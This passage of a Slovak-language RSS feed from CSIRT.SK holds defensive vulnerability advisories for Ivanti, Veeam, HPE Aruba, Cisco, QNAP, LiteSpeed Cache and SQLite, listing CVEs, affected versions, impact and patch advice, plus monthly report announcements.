<p><strong>CVE-2024-38655</strong>, <strong>CVE-2024-38656</strong>, <strong>CVE-2024-39710</strong>, <strong>CVE-2024-39711</strong>, <strong>CVE-2024-39712</strong> (CVSS skóre 9,1)<br><br>Kritické zraniteľnosti by vzdialený autentifikovaný útočník s oprávneniami administrátora mohol prostredníctvom injekcie argumentov zneužiť na vzdialené vykonanie kódu. Zraniteľnosti možno zneužiť zaslaním špeciálne vytvorených požiadaviek.<br><br><strong>CVE-2024-11007</strong>, <strong>CVE-2024-11006</strong>, <strong>CVE-2024-11005</strong> (CVSS skóre 9,1)<br><br>Kritické zraniteľnosti umožňujúce injekciu príkazov možno zneužiť na vzdialené vykonanie kódu. Zraniteľnosti možno zneužiť zaslaním špeciálne vytvorených požiadaviek a ich zneužitie vyžaduje administrátorské oprávnenia.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK"></span></strong></li>



<li><strong>Neoprávnená zmena v systéme<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;mso-bidi-font-family:
     Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:SK"></span></strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Výrobca odporúča používať len verzie s platnou technickou podporou a zasiahnuté systémy bezodkladne aktualizovať na najnovšie verzie. Konkrétne verzie produktov a návod na inštaláciu aktualizácií môžete nájsť na stránkach výrobcu v časti Zdroje.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-EPM-November-2024-for-EPM-2024-and-EPM-2022">https://forums.ivanti.com/s/article/Security-Advisory-EPM-November-2024-for-EPM-2024-and-EPM-2022</a></li>



<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/388027">https://exchange.xforce.ibmcloud.com/vulnerabilities/388027</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/387994">https://exchange.xforce.ibmcloud.com/vulnerabilities/387994</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/387996">https://exchange.xforce.ibmcloud.com/vulnerabilities/387996</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/387997">https://exchange.xforce.ibmcloud.com/vulnerabilities/387997</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/387998">https://exchange.xforce.ibmcloud.com/vulnerabilities/387998</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/387950">https://exchange.xforce.ibmcloud.com/vulnerabilities/387950</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/388000">https://exchange.xforce.ibmcloud.com/vulnerabilities/388000</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/388001">https://exchange.xforce.ibmcloud.com/vulnerabilities/388001</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1661/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť vo Veeam Backup Enterprise Manager možno zneužiť na obídenie mechanizmov autentifikácie</title>
		<link>/posts/1659</link>
					<comments>/posts/1659#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 12 Nov 2024 16:00:59 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Veeam]]></category>
		<guid isPermaLink="false">/?p=1659</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>Spoločnosť Veeam vydala bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť v produkte Veeam Backup Enterprise Manager (VBEM). Zraniteľnosť CVE-2024-40715 možno...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>
<p><strong>Spoločnosť Veeam vydala bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť v produkte Veeam Backup Enterprise Manager (VBEM). Zraniteľnosť CVE-2024-40715 možno zneužiť na obídenie mechanizmov autentifikácie.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Veeam Backup Enterprise Manager vo verzii 12.2.0.334 s hotfixom pre opravu CVE-2024-40715</li>
</ul>



<p><em>Pozn.: Zraniteľnosť je možné zneužiť len na inštanciách Veeam Backup &amp; Replication, na ktorých je aktivovaný doplnok Veeam Backup Enterprise Manager. Dostupnosť VBEM možno overiť spustením PowerShell-ového príkazu na Veeam Backup Server:</em><br><em><strong>„Get-VBRServer | Out-Null [Veeam.Backup.Core.SBackupOptions]::GetEnterpriseServerInfo() | Format-List”</strong></em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-40715</strong> (CVSS skóre 7,7)</p>



<p>Bližšie nešpecifikovanú vysoko závažnú zraniteľnosť s označením CVE-2024-40715 by vzdialený neautentifikovaný útočník prostredníctvom man-in-the-middle útoku mohol zneužiť na obídenie mechanizmov autentifikácie.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie mechanizmov autentifikácie</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná inštalácia hotfixu pre opravu CVE-2024-40715. Inštalácia hotfixu je možná len na Veeam Backup Enterprise Manager vo verzii 12.2.0.334. V prípade starších verzií je vopred potrebné vykonať aktualizáciu na verziu 12.2.0.334 použitím <a href="https://www.veeam.com/send_license/vmware-esx-backup/">Veeam Backup &amp; Replication ISO</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.veeam.com/kb4682">https://www.veeam.com/kb4682</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-40715">https://nvd.nist.gov/vuln/detail/CVE-2024-40715</a></li>



<li><a href="https://www.securityweek.com/veeam-patches-high-severity-vulnerability-as-exploitation-of-previous-flaw-expands/">https://www.securityweek.com/veeam-patches-high-severity-vulnerability-as-exploitation-of-previous-flaw-expands/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1659/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – október 2024</title>
		<link>/posts/1653</link>
					<comments>/posts/1653#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 11 Nov 2024 13:37:33 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<guid isPermaLink="false">/?p=1653</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci október 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci október 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov  monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti.  Štandardne tento príspevok prináša prehľad udalostí a informácií  zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/11/MS202410.pdf">Mesačná správa – 10/2024 PDF (1 536 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1653/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v prístupových bodoch od HPE Aruba Networking</title>
		<link>/posts/1646</link>
					<comments>/posts/1646#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 08 Nov 2024 15:13:53 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Aruba]]></category>
		<category><![CDATA[HPE]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1646</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Hewlett-Packard-Logo-1999-1024x576.png" alt="" /></p>Spoločnosť Hewlett Packard Enterprise vydala bezpečnostné aktualizácie, ktoré opravujú 6 zraniteľností v operačných systémoch Instant AOS-8 a AOS-10 používaných v...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Hewlett-Packard-Logo-1999-1024x576.png" alt="" /></p>
<p><strong>Spoločnosť Hewlett Packard Enterprise vydala bezpečnostné aktualizácie, ktoré opravujú 6 zraniteľností v operačných systémoch Instant AOS-8 a AOS-10 používaných v prístupových bodoch Aruba Series, z čoho 2 sú označené ako kritické. Zraniteľnosti CVE-2024-42509 a CVE-2024-47460 možno zneužiť na injekciu príkazov a vzdialené vykonanie škodlivého kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>Prístupové body Aruba Series 103, 110, 120, 130, 200, 207, 210, 220, 300, 303, 310, 320, 330, 340, 500, 510, 530, 550, 630 a 650 s operačným systémom Instant AOS-8 a AOS-10:</p>



<ul>
<li>AOS-10.4.x.x vo verzii staršej ako 10.4.1.5</li>



<li>AOS-10.6.x.x vo všetkých verziách (ukončená podpora)</li>



<li>AOS-10.5.x.x vo všetkých verziách (ukončená podpora)</li>



<li>AOS-10.3.x.x vo všetkých verziách (ukončená podpora)</li>



<li>Instant AOS-8.12.x.x vo verzii staršej ako 8.12.0.3</li>



<li>Instant AOS-8.10.x.x vo verzii staršej ako 8.10.0.14</li>



<li>Instant AOS-8.11.x.x vo všetkých verziách (ukončená podpora)</li>



<li>Instant AOS-8.9.x.x vo všetkých verziách (ukončená podpora)</li>



<li>Instant AOS-8.8.x.x vo všetkých verziách (ukončená podpora)</li>



<li>Instant AOS-8.7.x.x vo všetkých verziách (ukončená podpora)</li>



<li>Instant AOS-8.6.x.x vo všetkých verziách (ukončená podpora)</li>



<li>Instant AOS-8.5.x.x vo všetkých verziách (ukončená podpora)</li>



<li>Instant AOS-8.4.x.x vo všetkých verziách (ukončená podpora)</li>



<li>Instant AOS-6.5.x.x vo všetkých verziách (ukončená podpora)</li>



<li>Instant AOS-6.4.x.x vo všetkých verziách (ukončená podpora)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-42509</strong> (CVSS skóre 9,8), <strong>CVE-2024-47460</strong> (CVSS skóre 9,0)</p>



<p>Kritické zraniteľnosti CVE-2024-42509 a CVE-2024-47460 sa nachádzajú v CLI (Command Line Interface) službe a vzdialený neautentifikovaný útočník by ich mohol zneužiť na injekciu príkazov a vykonanie škodlivého kódu. Zraniteľnosti je možné zneužiť zaslaním špeciálne vytvorených paketov na UDP port 8211, na ktorom počúva protokol PAPI slúžiaci na manažment prístupových bodov.</p>



<p><strong>CVE-2024-47461</strong> (CVSS skóre 7,2), <strong>CVE-2024-47462</strong> (CVSS skóre 7,2), <strong>CVE-2024-47463</strong> (CVSS skóre 7,2), <strong>CVE-2024-47464</strong> (CVSS skóre 6,8)</p>



<p>Vysoko závažné zraniteľnosti by vzdialený autentifikovaný útočník mohol zneužiť na vzdialené vykonanie škodlivého kódu alebo získanie neoprávneného prístupu k citlivým údajom.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Hewlett Packard Enterprise odporúča bezodkladnú aktualizáciu AOS-10 na verzie 10.4.1.5, 10.7.0.0, alebo novšie a Instant AOS-8 na verzie 8.10.0.14, 8.12.0.3 alebo novšie. V prípadoch, kedy nie je možné vykonať aktualizáciu, výrobca odporúča limitovať prístup k manažmentovým rozhraniam prostredníctvom sieťových a bezpečnostných prvkov. V prípade produktov s ukončenou podporou výrobca odporúča prechod na produkty s platnou technickou podporou. Ďalšie odporúčania výrobcu pre mitigáciu zraniteľností môžete nájsť <strong><a href="https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04722en_us&amp;docLocale=en_US" data-type="link" data-id="https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04722en_us&amp;docLocale=en_US">tu</a></strong>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04722en_us&amp;docLocale=en_US">https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04722en_us&amp;docLocale=en_US</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1646/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť v SQLite objavil model AI od Google</title>
		<link>/posts/1642</link>
					<comments>/posts/1642#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 08 Nov 2024 15:04:26 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[SQLite]]></category>
		<guid isPermaLink="false">/?p=1642</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/SQLite_logo.png" alt="" /></p>Tím Google Project Zero testoval využitie modelu umelej inteligencie Big Sleep pri hľadaní zraniteľností v známych open source produktoch. Model úspešne...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/SQLite_logo.png" alt="" /></p>
<p><strong>Tím Google Project Zero testoval využitie modelu umelej inteligencie Big Sleep pri hľadaní zraniteľností v známych open source produktoch. Model úspešne objavil zraniteľnosť v SQLite, ktorú neodhalili fuzzingové nástroje. Zraniteľnosť súvisí s podtečením medzipamäte zásobníka, čo môže viesť k schopnosti zapisovať na halde mimo povolené hodnoty.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SQLite 3.47.0 2024-10-05 12:02:17 2f7eab381e16760952d1c90a9119d2a217933f0136442d8f6eeb6d95e366ca4f (64-bit)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Model umelej inteligencie Big Sleep, ktorý prevádzkuje tím Google Project Zero v spolupráci s Google DeepMind, objavil svoju prvú zraniteľnosť v platforme SQLite. Chybu doposiaľ neodhalili automatizované fuzzingové nástroje, nasadené v rámci projektu. Tím testoval správanie a využitie modelu Big Sleep pri hľadaní zraniteľností v open source produktoch.<br><br>Objavená zraniteľnosť súvisí s podtečením vyrovnávacej pamäte zásobníka, čo ďalej dovoľuje útočníkom zapisovať do haldy mimo povolené hodnoty. Problematické je miesto zápisu, pretože sa na ňom nachádza ukazovateľ <em>pConstraint</em>, ktorý sa dereferencuje v ďalšom kroku behu programu.<br><br>Chyba spočíva v funkcii <em>seriesBestIndex</em>, ktorá nesprávne narába s parametrami <em>rowid</em>. Funkcia očakáva vo vstupe pre parameter <em>iColumn</em> kladné hodnoty (1, 2 alebo 3), no môže do neho vstupovať tiež záporná (-1). V závislosti od konfigurácie to môže spôsobiť zlyhanie pri vyhodnotení riadku „<em>assert( iCol>=0 &amp;&amp; iCol&lt;=2 );</em>“ alebo viesť k zápisu do pamäte mimo povolené hodnoty.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Zápis do pamäte potenciálne zneužiteľný na útok</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia na najnovšiu verziu.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.html">https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.html<span style="font-size:12.0pt;line-height:107%;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://project-zero.issues.chromium.org/issues/372435124">https://project-zero.issues.chromium.org/issues/372435124</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1642/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v produkte Cisco Unified Industrial Wireless Software</title>
		<link>/posts/1640</link>
					<comments>/posts/1640#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 08 Nov 2024 15:00:22 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1640</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco vydala bezpečnostné aktualizácie svojho produktu Cisco Unified Industrial Wireless Software, ktoré opravujú kritickú zraniteľnosť. Produkt je využívaný v...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco vydala bezpečnostné aktualizácie svojho produktu Cisco Unified Industrial Wireless Software, ktoré opravujú kritickú zraniteľnosť. Produkt je využívaný v rámci URWB (Ultra Reliable Wireless Backhaul) prístupových bodov určených pre priemyselné siete. CVE-2024-20418 možno zneužiť na vzdialené vykonanie príkazov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>prístupové body Cisco Catalyst IW9165D, Catalyst IW9165E a Catalyst IW9167E s Cisco Unified Industrial Wireless Software vo verziách starších ako 17.15.1</li>
</ul>



<p><em><strong>Pozn.: Zraniteľnosť je možné zneužiť len na prístupových bodoch, ktoré sú prevádzkované v režime UWBR.</strong> Či je Vaše zariadenie prevádzkované v tomto režime môžete overiť zadaním konzolového príkazu „<strong>show mpls-config</strong>“, ktorý je dostupný len na zariadeniach v tomto režime.</em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-20418</strong> (CVSS skóre 10,0)<br><br>Kritická zraniteľnosť Cisco Unified Industrial Wireless Software spočíva v nedostatočnom overovaní používateľských vstupov v rámci webového manažmentového rozhrania a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorenej HTTP požiadavky mohol zneužiť na vzdialené vykonanie príkazov na operačnom systéme zariadenia, s oprávneniami používateľa root. </p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Cisco Unified Industrial Wireless Software na verziu 17.15.1 a vyššie.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-backhaul-ap-cmdinj-R7E28Ecs">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-backhaul-ap-cmdinj-R7E28Ecs</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1640/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť QNAP QuRouter</title>
		<link>/posts/1638</link>
					<comments>/posts/1638#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 08 Nov 2024 14:57:18 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[QNAP]]></category>
		<category><![CDATA[QuRouter]]></category>
		<guid isPermaLink="false">/?p=1638</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/03/NAS_QNAP-1.jpg" alt="" /></p>Spoločnosť QNAP vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zero-day zraniteľnosť vo svojom operačnom systéme QuRouter. Bližšie nešpecifikovanú zraniteľnosť s označením...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/03/NAS_QNAP-1.jpg" alt="" /></p>
<p><strong>Spoločnosť QNAP vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zero-day zraniteľnosť vo svojom operačnom systéme QuRouter. Bližšie nešpecifikovanú zraniteľnosť s označením CVE-2024-50389 možno zneužiť na získanie úplnej kontroly nad zariadením. Informácie o druhu zraniteľnosti neboli zverejnené.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>QuRouter 2.4.x</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-50389</strong><br><br>Aplikácia QuRouter spoločnosti QNAP obsahuje kritickú zero-day zraniteľnosť, ktorú odhalil tím Viettel Cyber Security počas súťaže Pwn2Own Ireland. Chyba umožňuje získať útočníkom prístup ku zraniteľným zariadeniam. Žiadne bližšie informácie o zraniteľnosti zatiaľ neboli zverejnené.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neautorizovaný prístup k zariadeniu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia QuRouter na verziu 2.4.5.032 alebo novšiu. Postup nájdete <a href="https://www.qnap.com/en-in/security-advisory/qsa-24-45" data-type="link" data-id="https://www.qnap.com/en-in/security-advisory/qsa-24-45">tu</a>.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.qnap.com/en-in/security-advisory/qsa-24-45">https://www.qnap.com/en-in/security-advisory/qsa-24-45</a></li>



<li><a href="https://securityonline.info/qnap-patches-zero-day-flaw-cve-2024-50389-in-qurouter-following-pwn2own-ireland-2024-exploits/">https://securityonline.info/qnap-patches-zero-day-flaw-cve-2024-50389-in-qurouter-following-pwn2own-ireland-2024-exploits/<span style="font-size:12.0pt;line-height:107%;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://x.com/CyberxtronTech/status/1853682341022998691?mx=2">https://x.com/CyberxtronTech/status/1853682341022998691?mx=2</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1638/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť pluginu WordPress LiteSpeed Cache umožňuje získanie administrátorského prístupu</title>
		<link>/posts/1657</link>
					<comments>/posts/1657#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 08 Nov 2024 14:54:00 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[LiteSpeed Cache]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=1657</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>Vývojári populárneho pluginu WordPress LiteSpeed Cache vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú bezpečnostnú zraniteľnosť. CVE-2024-50550 možno zneužiť na eskaláciu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>
<p><strong>Vývojári populárneho pluginu WordPress LiteSpeed Cache vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú bezpečnostnú zraniteľnosť. CVE-2024-50550 možno zneužiť na eskaláciu privilégií a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress plugin LiteSpeed Cache vo verziách starších ako 6.5.2</li>
</ul>



<p><em><strong>Pozn.: Zraniteľnosť je možné zneužiť len na inštanciách LiteSpeed Cache s nasledujúcou konfiguráciou komponentu crawler:</strong><br>Crawler->General Settings->Crawler: ON<br>Crawler->General Settings->Run Duration: 2500 – 4000<br>Crawler->General Settings->Interval Between Runs: 2500 – 4000<br>Crawler->General Settings->Server Load Limit: 0<br>Crawler->Simulation Settings->Role Simulation: 1 (ID používateľa s rolou Administrator)<br>Crawler->Summary->Activate: Turn every row to OFF except Administrator</em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-50550</strong> (CVSS skóre 8,1)</p>



<p>Vysoko závažná zraniteľnosť s označením CVE-2024-50550 spočíva v nedostatočnom overovaní hashov v rámci funkcionality pre simuláciu používateľov (role simulation), ktorá je súčasťou komponentu crawler. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na eskaláciu privilégií a získanie administrátorského prístupu. Administrátorský prístup možno zneužiť na nahranie škodlivých pluginov a zmenu konfigurácie redakčného systému.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia LiteSpeed  Cache na verziu 6.5.2 a vyššie.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://patchstack.com/articles/rare-case-of-privilege-escalation-patched-in-litespeed-cache-plugin/ ">https://patchstack.com/articles/rare-case-of-privilege-escalation-patched-in-litespeed-cache-plugin/ </a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-50550">https://nvd.nist.gov/vuln/detail/CVE-2024-50550</a></li>



<li><a href="https://thehackernews.com/2024/10/litespeed-cache-plugin-vulnerability.html">https://thehackernews.com/2024/10/litespeed-cache-plugin-vulnerability.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1657/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností október 2024</title>
		<link>/posts/1631</link>
					<comments>/posts/1631#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 07 Nov 2024 13:42:23 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1631</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci október 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných  udalostiach a zraniteľnostiach informačných systémov zaznamenaných v  mesiaci október 2024.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/11/2024_10_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/11/2024_10_mesacnik.pdf">Mesačný prehľad – 10/2024 PDF (714 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1631/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Protect AI: Októbrové zraniteľnosti v modeloch AI</title>
		<link>/posts/1626</link>
					<comments>/posts/1626#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 31 Oct 2024 12:53:22 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Protect AI]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1626</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Protect-ai-300x214-1.png" alt="" /></p>Protect AI&#8217;s huntr je prvý program odmeňovania za nájdenie zraniteľností v oblasti AI/ML na svete. Októbrová správa tejto iniciatívy informuje...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Protect-ai-300x214-1.png" alt="" /></p>
<p><strong>Protect AI&#8217;s huntr je prvý program odmeňovania za nájdenie zraniteľností v oblasti AI/ML na svete. Októbrová správa tejto iniciatívy informuje o 34 objavených zraniteľnostiach, z toho sú 3 kritické. Najzávažnejšie chyby umožňujú vzdialené vykonávanie kódu, prístup ku chráneným zdrojom a únik citlivých informácií.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
